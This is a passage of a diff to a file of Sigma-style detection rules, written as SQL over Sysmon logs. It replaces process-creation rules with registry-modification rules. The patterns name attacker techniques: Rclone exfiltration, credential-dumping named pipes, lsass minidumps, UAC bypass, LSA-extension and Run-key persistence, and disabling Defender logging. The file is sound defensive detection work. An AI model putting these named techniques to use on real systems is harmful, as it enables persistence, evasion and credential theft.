'%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_mal_blue_mockingbird.yml" }, { - "title": "PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR 
CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", - "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' 
OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_powershell_public_folder.yml" - }, - { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", "status": "experimental", - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], "falsepositives": [ - "Software installation" 
+ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_persistence_lsa_extension.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - 
"status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "author": "Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_persistence_mycomputer.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", - "status": "test", - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "status": "experimental", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unknown yet" + "Other Antivirus software installations could 
cause Windows to disable that eventlog (unknown)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. 
The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (Image LIKE '%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (Image LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR Image LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR 
CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_hafnium.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", - "status": "test", - "description": "Detects execution of javascript code using \"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "status": "experimental", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005" + "attack.persistence", + "attack.t1546.012" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE 
'\\'))" ], - "filename": "proc_creation_win_mshta_javascript.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "Malicious Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "status": "experimental", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE 
'\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. 
